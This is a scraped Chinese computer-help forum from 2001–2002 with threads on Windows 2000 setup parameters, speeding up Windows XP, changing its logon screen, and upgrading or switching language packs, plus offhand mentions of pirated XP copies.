
经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-29 15:23:37 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 收藏该主题供以后查看 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
Winnt.exe的参数

1．/r：<指定目录名>
    此参数可在安装时一起安装用户所指定目录（要包含在I386目录下）中的内容，如一些较旧的硬件设备可能不被Windows 2000自带的驱动程序所支持，那么我们可将其驱动程序所在的目录在安装时一并装入Winnt目录下。

2．/rx：<指定目录名>
    此参数与上述参数功能相同，只是在安装后将这个用户指定的目录删除。

3．/s：<路径名>
    默认情况下，安装程序在安装时会调用位于当前目录（即光盘I386目录）中的众多安装源文件。我们可先将I386目录全部复制到硬盘上，再用此命令参数如Winnt /s:c:\i386进行定位，以加快安装速度。

4．/t：<分区名>
    默认情况下，安装程序用C盘作为安装时临时文件的存放空间，并在其上安装 Windows 2000。我们可用此命令参数进行更改，如Winnt /t:d: 。

5．/u：<应答文件名>
    此参数可结合应答文件来实现无人看守的全自动安装。具体方法将在后文中介绍。
Winnt32.exe的参数

    此命令的许多参数都与Winnt.exe命令的参数功能相同。如/copydir：对应/r：、/copysource：对应/rx：、/s：对应/s：、/tempdrive：对应/t：、/unattend：对应/u：，其他用得不多的参数就不再一一介绍了

[这消息被yunbin编辑过(编辑时间2001-11-29 15:31:24)]

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

len

SlowHorse
积分：1192
发帖：568
来自：hebei
注册：2001-09-29
 发表于 2001-11-29 15:29:03 按此观看len的个人资料 按此发邮件给len len 的 oicq 是3248586,查看 3248586 的资料 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
收下了,以后重装就有用了!

Dripping water wears away a stone.
上一贴 | 下一贴
快速回复 | 主题：win2000安装参数
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


Windows XP系统越来越慢了阿？

计算机技术
Windows XP系统越来越慢了阿？

上一贴 | 下一贴
发表人 主题: Windows XP系统越来越慢了阿？
imacwei

终级用户
积分：2243
发帖：1041
来自：China.Jiangs
注册：2001-07-23
 发表于 2001-11-18 21:01:06 按此观看imacwei的个人资料 按此发邮件给imacwei 访问imacwei的主页 imacwei 的 oicq 是36110975,查看 36110975 的资料 收藏该主题供以后查看 发送悄悄话给imacwei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看imacwei的IP
唉…还是怀念刚刚安装Windows XP时候的日子，无论是上网还是干其他的东西，速度都很快！可是随着使用时间的增加，现在机器的反应是越来越慢了！而且有的时候还会出现短暂的死机！使用优化以后，感觉也不是很明显！大家有没有什么办法来着！

Loading…………
WINDOWS2000-SP2+IE5.5
FIREWORKS,the solution for professional Web graphic design and production.
Press Anykey To Continue…

iMacWei
hellslayer

初级用户
积分：20
发帖：251
来自：不能上网的学校
注册：2001-04-04
 发表于 2001-11-22 19:59:25 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP
因为你每次安装/删除软件的时候并不是完全能删除干净，总会把留在WINDOWS目录下的文件保留（笑）下来的。 找norton的工具看看能不能清理吧。据说norton跟windows的结合是最紧密的

"我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
ximoo

我就是醒目
积分：1884
发帖：2461
来自：火星
注册：2001-09-05
 发表于 2001-11-22 20:14:17 按此观看ximoo的个人资料 按此发邮件给ximoo 访问ximoo的主页 ximoo 的 oicq 是496549,查看 496549 的资料 发送悄悄话给ximoo 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ximoo的IP
我刚刚装好xp

速度好慢呀

怎么优化呀？？？

我的是cellonⅡ733 256m内存 20g硬盘 810主板

-|ximoo.com|-

经典CS服务器地址及状态查看 | CS反作弊客户端下载
hellslayer

初级用户
积分：20
发帖：251
来自：不能上网的学校
注册：2001-04-04
 发表于 2001-11-22 20:32:01 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP
刚装完速度慢，可能是跟你的机器的配置有关，XP是很要求配置的。
你用魔法兔子优化一下。

"我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
ximoo

我就是醒目
积分：1884
发帖：2461
来自：火星
注册：2001-09-05
 发表于 2001-11-22 20:40:57 按此观看ximoo的个人资料 按此发邮件给ximoo 访问ximoo的主页 ximoo 的 oicq 是496549,查看 496549 的资料 发送悄悄话给ximoo 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ximoo的IP
no 兔子！！！！！

：~~~~~~~~~~~~~~

有windows优化大师 行不？？

-|ximoo.com|-

经典CS服务器地址及状态查看 | CS反作弊客户端下载
EastSoul

初级用户
积分：82
发帖：35
来自：
注册：2001-07-14
 发表于 2001-11-22 20:52:09 按此观看EastSoul的个人资料 按此发邮件给EastSoul 访问EastSoul的主页 EastSoul 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给EastSoul 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看EastSoul的IP
我也刚装完,速度蛮好..还有就是大多数驱动都不需要安装,很方便
imacwei,不要吓我啊
hellslayer,你是说NU??

如此悲伤,如此
无奈地闭上了双眼
因为如此的荒芜
无论在怎样的空间
都是心灵巨大的不堪
不明白生命的绝境已然降临
死亡,在地平线上
闪烁魅人的光芒

[fly]==eAST sOUL==[/fly]

windangel

终级用户
积分：1258
发帖：609
来自：风之国度
注册：2001-02-28
 发表于 2001-11-22 21:47:37 按此观看windangel的个人资料 按此发邮件给windangel 访问windangel的主页 windangel 的 oicq 是870777,查看 870777 的资料 发送悄悄话给windangel 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看windangel的IP
XP系统无论怎么优化也是慢，无用的东西太多了，如果你是新手建议不要使用！

Blueidea Web Team
Moderator Of multimedia forum
hellslayer

初级用户
积分：20
发帖：251
来自：不能上网的学校
注册：2001-04-04
 发表于 2001-11-23 08:39:43 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP
EAST：是nu，主要是对注册表进行清理。

另外推荐一个XP的优化软件：Tweak-XP
最新版本：1.21.1
文件大小：3670KB
软件授权：共享，50次试用
平台：XP
下载地址：ftp://ftp.download.com.cn/pub/new_system/tweakxp-setup.exe&name=tweakxp-setup.exe

"我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
greenyang

终级用户
积分：799
发帖：235
来自：山东莱阳
注册：2001-09-11
 发表于 2001-11-23 12:11:42 按此观看greenyang的个人资料 按此发邮件给greenyang 访问greenyang的主页 greenyang 的 oicq 是2114123,查看 2114123 的资料 发送悄悄话给greenyang 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看greenyang的IP
重装不就得了，平时安装软件的时候不要装在系统盘上就行了。四十分钟搞定。
我现在的XP也慢得不得了。

是　谁　无　事　种　芭　蕉，
早　也　潇　潇，晚　也　潇　潇　！
DW5

阻击之眼
积分：2678
发帖：2517
来自：blueidea
注册：2001-07-29
 发表于 2001-11-23 18:36:12 按此观看DW5的个人资料 按此发邮件给DW5 DW5 的 oicq 是48580488,查看 48580488 的资料 发送悄悄话给DW5 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DW5的IP
大家的都是D版的破解XP吧？？？？

永远走在时代的最前端。。。

Blueidea Cs Team
Team Nicker
-]Blueidea[- Y.DW5

Fly

Developer
积分：3998
发帖：995
来自：
注册：2001-10-31
 发表于 2001-11-23 21:42:52 按此观看Fly的个人资料 按此发邮件给Fly Fly 的 oicq 是7969660,查看 7969660 的资料 发送悄悄话给Fly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Fly的IP
楼上的，如果有正盘，借兄弟我刻一下

我的虚荣心是用十句话说出别人用一本书讲出的东西和别人用一本书没有讲出的东西.
----尼采

randomix

小 乱
积分：4642
发帖：1647
来自：亂度謎城
注册：2000-11-30
 发表于 2001-11-24 01:14:25 按此观看randomix的个人资料 按此发邮件给randomix 访问randomix的主页 randomix 的 oicq 是3016887,查看 3016887 的资料 发送悄悄话给randomix 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看randomix的IP
tweak xp跟Powertoy for xp的tweak UI差不多嘛

always ran...
imacwei

终级用户
积分：2243
发帖：1041
来自：China.Jiangs
注册：2001-07-23
 发表于 2001-11-25 09:26:06 按此观看imacwei的个人资料 按此发邮件给imacwei 访问imacwei的主页 imacwei 的 oicq 是36110975,查看 36110975 的资料 发送悄悄话给imacwei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看imacwei的IP
看来是没有办法了！
不愧是为P4设计的操作系统，连P3用起来都不觉得爽！
不过把所有的效果去掉以后，可能会好一点！

Loading…………
WINDOWS2000-SP2+IE5.5
FIREWORKS,the solution for professional Web graphic design and production.
Press Anykey To Continue…

iMacWei
bxr

初级用户
积分：60
发帖：27
来自：中国辽宁
注册：2001-10-08
 发表于 2001-11-25 11:23:47 按此观看bxr的个人资料 按此发邮件给bxr bxr 的 oicq 是24871200,查看 24871200 的资料 发送悄悄话给bxr 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bxr的IP
先在注册表里把相应的没有用的信息删掉~
然后再去把WINXP里的一些文件搞定就OK了~
如果还不行~那就告诉你~你应该从装系统了~

初学者~
多帮俺呀
BLUETOOTH

初级用户
积分：0
发帖：2
来自：
注册：2001-11-15
 发表于 2001-11-25 16:45:52 按此观看BLUETOOTH的个人资料 按此发邮件给BLUETOOTH 发送悄悄话给BLUETOOTH 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BLUETOOTH的IP
慢
已经不用了…………

cd/usr/src/linux
make config启动x系统…………
嘿嘿

坏笑
积分：403
发帖：524
来自：
注册：2001-10-06
 发表于 2001-11-25 16:50:09 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
DW5在上个帖子中说
引用:
大家的都是D版的破解XP吧？？？？

呵呵，如果不是破解的就不是慢的问题了

缘是天定,份在人为.
ADSL

终级用户
积分：2969
发帖：668
来自：贫困山区
注册：2001-03-06
 发表于 2001-11-25 17:25:21 按此观看ADSL的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给ADSL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ADSL的IP
我想可能是像winme一样的系统恢复的缘故,把它关了就可以了

好好学习，努力做事
DayinNightout

超级用户
积分：338
发帖：150
来自：CCF
注册：2000-12-18
 发表于 2001-11-25 17:33:23 按此观看DayinNightout的个人资料 按此发邮件给DayinNightout 发送悄悄话给DayinNightout 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DayinNightout的IP
有可能是你的 xp 版本不好(破解的不好),现在比较完美的还是 select 版

木有签名#@$%
DragonsDriver

初级用户
积分：8
发帖：4
来自：上海
注册：2001-12-13
 发表于 2001-12-13 14:35:22 按此观看DragonsDriver的个人资料 按此发邮件给DragonsDriver DragonsDriver 的 oicq 是14338584,查看 14338584 的资料 发送悄悄话给DragonsDriver 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DragonsDriver的IP
hellslayer:
nu用什么版本的？有专为xp的吗？
兔子没问题吗？
还是用tweak 或者powertoys安全吧？
bb

初级用户
积分：78
发帖：34
来自：
注册：2001-06-07
 发表于 2001-12-17 23:23:42 按此观看bb的个人资料 按此发邮件给bb 发送悄悄话给bb 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bb的IP
1.如果内存大的话，建议调高虚拟内存
2.用回传统窗口
阿修罗飞天舞

无关风月
现任版主
积分：2272
发帖：2263
来自：杭州
注册：2001-05-21
 发表于 2001-12-18 08:43:26 按此观看阿修罗飞天舞的个人资料 按此发邮件给阿修罗飞天舞 阿修罗飞天舞 的 oicq 是5194599,查看 5194599 的资料 发送悄悄话给阿修罗飞天舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿修罗飞天舞的IP
XP的稳定性是毋庸置疑
关键是你的硬件的配置
如果你的硬件达到它的推荐配置,就可以差不多始终稳定
别告诉我你128内存,PIII芯片

不过我不喜欢这个操作系统,简直过分,连开关机都和审犯人一样,要我回答问题,可恶!
还有硬件安装限制,又有期限限制,还有升级限制
KAO,去死吧,我宁可用DOS

坐看秋草只须臾 秋夕惊鸿往日情 不忍萧瑟枯原景 思思念念无日月
随风散去荻上露 薄暮伤别彷若梦 秋日难留故人心 今年今生今日尽

Blueidea Web Team

嘿嘿

坏笑
积分：403
发帖：524
来自：
注册：2001-10-06
 发表于 2001-12-18 10:44:21 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
阿修罗飞天舞在上个帖子中说
引用:
不过我不喜欢这个操作系统,简直过分,连开关机都和审犯人一样,要我回答问题,可恶!

提不提问不是可选的吗，你不选不就成了吗

缘是天定,份在人为.
话草

终级用户
积分：629
发帖：197
来自：
注册：2001-08-07
 发表于 2002-02-05 10:34:26 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP
ximoo在上个帖子中说
引用:
我刚刚装好xp

速度好慢呀

怎么优化呀？？？

我的是cellonⅡ733 256m内存 20g硬盘 810主板

当开启所有 效果时 , 运行程序很慢 ,我 的 P3 533EB+ 384 M sdram 也有点吃不消(同学的athlon xp 用 winxp 的那种超爽感觉全没了) , 但是 关闭所有效果后(即调整为最佳性能, 右键我的电脑,高级,性能,调整) , 速度回来了 , 感觉比ME快 , 其他一切稳定 , 驱动安装方便, isp 连接迅速 , wmp8 非常好使 , 硬盘效能提高显著 ...... 总体感觉超跃以前 所有版本的 "瘟倒死" ,

onlysnake

终级用户
积分：1971
发帖：696
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-05 15:00:19 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
我哥们的网吧服务器装的也是“叉屁”，我感觉连网效果还不错，速度很快，
P3 733，256M内存，810主板，40G。
我认为“叉屁”还是做的不错的，有很多功能应该还没有被大家开发出来吧！

不管怎么说，我挺喜欢的！！！~~~~~~~~~~~~~~

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

imacwei

终级用户
积分：2243
发帖：1041
来自：China.Jiangs
注册：2001-07-23
 发表于 2002-02-05 16:22:04 按此观看imacwei的个人资料 按此发邮件给imacwei 访问imacwei的主页 imacwei 的 oicq 是36110975,查看 36110975 的资料 发送悄悄话给imacwei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看imacwei的IP
微软的操作系统，从95-XP,他的网络功能我们还是应该肯定的，越来越厉害，使用XP上网，速度很快的，就是机器受不了，我超到800还可以勉强应付，呵呵！而且有的时候还老是会来一个什么错误，问你要不要发送，而且现在的一些站点上老是说XP的不是，呵呵，什么打了这个补丁造成另外一个漏洞啦，等等，好多的！我现在都改回我的2000了，呵呵！还是这个比较爽！

Loading…………
WINDOWS2000-SP2+IE5.5
FIREWORKS,the solution for professional Web graphic design and production.
Press Anykey To Continue…

iMacWei
xqlyg

超级用户
积分：366
发帖：93
来自：china
注册：2002-02-07
 发表于 2002-02-07 16:30:36 按此观看xqlyg的个人资料 按此发邮件给xqlyg xqlyg 的 oicq 是41770172,查看 41770172 的资料 发送悄悄话给xqlyg 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看xqlyg的IP
那还体验什么xp的漂亮外观！
xqlyg

超级用户
积分：366
发帖：93
来自：china
注册：2002-02-07
 发表于 2002-02-07 17:05:54 按此观看xqlyg的个人资料 按此发邮件给xqlyg xqlyg 的 oicq 是41770172,查看 41770172 的资料 发送悄悄话给xqlyg 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看xqlyg的IP
它就是很慢，
windows优化大师不错
上一贴 | 下一贴
快速回复 | 主题：Windows XP系统越来越慢了阿？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


WINXP的登录画面如何更换？

计算机技术
WINXP的登录画面如何更换？

上一贴 | 下一贴
发表人 主题: WINXP的登录画面如何更换？
greenyang

终级用户
积分：799
发帖：235
来自：山东莱阳
注册：2001-09-11
 发表于 2001-11-16 12:32:37 按此观看greenyang的个人资料 按此发邮件给greenyang 访问greenyang的主页 greenyang 的 oicq 是2114123,查看 2114123 的资料 收藏该主题供以后查看 发送悄悄话给greenyang 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看greenyang的IP
一个朋友给了我十五张WINXP的桌面，每一张都自带一个logonui.exe文件，可是怎么安装呢？
谢谢。

[这消息被greenyang编辑过(编辑时间2001-11-19 15:20:03)]

是　谁　无　事　种　芭　蕉，
早　也　潇　潇，晚　也　潇　潇　！
Fly

Developer
积分：3998
发帖：995
来自：
注册：2001-10-31
 发表于 2001-11-16 20:38:02 按此观看Fly的个人资料 按此发邮件给Fly Fly 的 oicq 是7969660,查看 7969660 的资料 发送悄悄话给Fly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Fly的IP
http://www.pconline.com.cn/pcedu/soft/system/winxp/doc/011116_xpbootlogo_1.htm

我的虚荣心是用十句话说出别人用一本书讲出的东西和别人用一本书没有讲出的东西.
----尼采

randomix

小 乱
积分：4642
发帖：1647
来自：亂度謎城
注册：2000-11-30
 发表于 2001-11-17 17:09:12 按此观看randomix的个人资料 按此发邮件给randomix 访问randomix的主页 randomix 的 oicq 是3016887,查看 3016887 的资料 发送悄悄话给randomix 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看randomix的IP
我贴过的呀

always ran...
greenyang

终级用户
积分：799
发帖：235
来自：山东莱阳
注册：2001-09-11
 发表于 2001-11-19 15:20:40 按此观看greenyang的个人资料 按此发邮件给greenyang 访问greenyang的主页 greenyang 的 oicq 是2114123,查看 2114123 的资料 发送悄悄话给greenyang 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看greenyang的IP
Fly在上个帖子中说
引用:
http://www.pconline.com.cn/pcedu/soft/system/winxp/doc/011116_xpbootlogo_1.htm

可是这是启动画面,我说的是登录画面啊

是　谁　无　事　种　芭　蕉，
早　也　潇　潇，晚　也　潇　潇　！
greenyang

终级用户
积分：799
发帖：235
来自：山东莱阳
注册：2001-09-11
 发表于 2001-11-19 15:21:38 按此观看greenyang的个人资料 按此发邮件给greenyang 访问greenyang的主页 greenyang 的 oicq 是2114123,查看 2114123 的资料 发送悄悄话给greenyang 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看greenyang的IP
randomix在上个帖子中说
引用:
我贴过的呀

你贴在哪个版啊?

是　谁　无　事　种　芭　蕉，
早　也　潇　潇，晚　也　潇　潇　！
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-19 15:29:31 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
这里吧~

http://tech.sina.com.cn/c/2001-11-16/7220.html

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

上一贴 | 下一贴
快速回复 | 主题：WINXP的登录画面如何更换？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


XP Group Policy 文档下载

计算机技术
XP Group Policy 文档下载

上一贴 | 下一贴
发表人 | 主题: XP Group Policy 文档下载
flyingbird 想飞的心 积分：4546 发帖：1672 来自： 注册：1999-12-22 | 发表于 2001-11-19 10:56:00 按此观看flyingbird的个人资料 按此发邮件给flyingbird 收藏该主题供以后查看 发送悄悄话给flyingbird 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看flyingbird的IP Windows XP Group Policy Object setting document 行者无疆 Blueidea Web Team Team member
上一贴 | 下一贴
快速回复 | 主题：XP Group Policy 文档下载
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


在2000中升级XP好吗？

计算机技术
在2000中升级XP好吗？

上一贴 | 下一贴
发表人 主题: 在2000中升级XP好吗？
DW5

阻击之眼
积分：2678
发帖：2517
来自：blueidea
注册：2001-07-29
 发表于 2001-11-15 13:47:44 按此观看DW5的个人资料 按此发邮件给DW5 DW5 的 oicq 是48580488,查看 48580488 的资料 收藏该主题供以后查看 发送悄悄话给DW5 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DW5的IP
终于买到了XP的破解···
我的是双系统，98＋2000，现在想98＋XP，但不想洗掉98，大家帮帮我

永远走在时代的最前端。。。

Blueidea Cs Team
Team Nicker
-]Blueidea[- Y.DW5

randomix

小 乱
积分：4642
发帖：1647
来自：亂度謎城
注册：2000-11-30
 发表于 2001-11-15 18:12:40 按此观看randomix的个人资料 按此发邮件给randomix 访问randomix的主页 randomix 的 oicq 是3016887,查看 3016887 的资料 发送悄悄话给randomix 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看randomix的IP
没问题的。

always ran...
cola

终级用户
积分：1312
发帖：775
来自：
注册：2000-02-27
 发表于 2001-11-15 18:39:57 按此观看cola的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给cola 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cola的IP
简体中文的2000只能用简体中文的xp升级，那种用汉化包的不行。

It is our loading program. We can load anything from clothes, to weapons, to training simulations.Anything we need.
greenyang

终级用户
积分：799
发帖：235
来自：山东莱阳
注册：2001-09-11
 发表于 2001-11-16 16:13:40 按此观看greenyang的个人资料 按此发邮件给greenyang 访问greenyang的主页 greenyang 的 oicq 是2114123,查看 2114123 的资料 发送悄悄话给greenyang 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看greenyang的IP
cola在上个帖子中说
引用:
简体中文的2000只能用简体中文的xp升级，那种用汉化包的不行。

可以的，我的就是在简体中文的2000上装的XP，后又运行的汉化包。WINXP一共四张蝶。

是　谁　无　事　种　芭　蕉，
早　也　潇　潇，晚　也　潇　潇　！
Fly

Developer
积分：3998
发帖：995
来自：
注册：2001-10-31
 发表于 2001-11-16 20:35:19 按此观看Fly的个人资料 按此发邮件给Fly Fly 的 oicq 是7969660,查看 7969660 的资料 发送悄悄话给Fly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Fly的IP
我还是喜欢格了，重装XP，备份好2K的数据应该没问题

我的虚荣心是用十句话说出别人用一本书讲出的东西和别人用一本书没有讲出的东西.
----尼采

上一贴 | 下一贴
快速回复 | 主题：在2000中升级XP好吗？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


怎样将已经安装了汉化包的WINXP再改回英文版？

计算机技术
怎样将已经安装了汉化包的WINXP再改回英文版？

上一贴 | 下一贴
发表人 | 主题: 怎样将已经安装了汉化包的WINXP再改回英文版？
greenyang 终级用户 积分：799 发帖：235 来自：山东莱阳 注册：2001-09-11 | 发表于 2001-11-16 16:11:50 按此观看greenyang的个人资料 按此发邮件给greenyang 访问greenyang的主页 greenyang 的 oicq 是2114123,查看 2114123 的资料 收藏该主题供以后查看 发送悄悄话给greenyang 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看greenyang的IP 巩固一下英语，想用英文版本的WINXP，不会只有重装这一种吧？ 是 谁 无 事 种 芭 蕉， 早 也 潇 潇，晚 也 潇 潇 ！
hellslayer 初级用户 积分：20 发帖：251 来自：不能上网的学校 注册：2001-04-04 | 发表于 2001-11-16 19:21:51 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP 控制面板---->区域---->区域设置，选择英语（英国）就行了。 "我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
DayinNightout 超级用户 积分：338 发帖：150 来自：CCF 注册：2000-12-18 | 发表于 2001-11-16 19:35:33 按此观看DayinNightout的个人资料 按此发邮件给DayinNightout 发送悄悄话给DayinNightout 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DayinNightout的IP 最好就是建立两个ｕｓｅｒ，一个用ｅ文另一个用中文包 木有签名#@$%
上一贴 | 下一贴
快速回复 | 主题：怎样将已经安装了汉化包的WINXP再改回英文版？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


我的电脑在安装新软件的时候出现这样的提示

计算机技术
我的电脑在安装新软件的时候出现这样的提示

上一贴 | 下一贴
发表人 主题: 我的电脑在安装新软件的时候出现这样的提示
cinkey

我和我追逐的梦
积分：1132
发帖：2183
来自：杭州
注册：2001-06-21
 发表于 2001-11-12 11:50:21 按此观看cinkey的个人资料 按此发邮件给cinkey 访问cinkey的主页 cinkey 的 oicq 是23516844,查看 23516844 的资料 收藏该主题供以后查看 发送悄悄话给cinkey 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cinkey的IP

每次安装新的程序的时候就这样，不知为何？

 悠長假期   |  反恐联盟  |  CS服务器状态查看  |  CS反作弊客户端
2smile

活着就好
积分：1622
发帖：1907
来自：SD
注册：2001-05-13
 发表于 2001-11-12 20:04:59 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP
找个新的文件到dos下覆盖试试。

想见不如怀念?
thinktip.com
msn: thinktip@hotmail.com
icq: 98885338
Quester

鼠标说话
是个版主
积分：2604
发帖：1175
来自：GTA
注册：2000-08-28
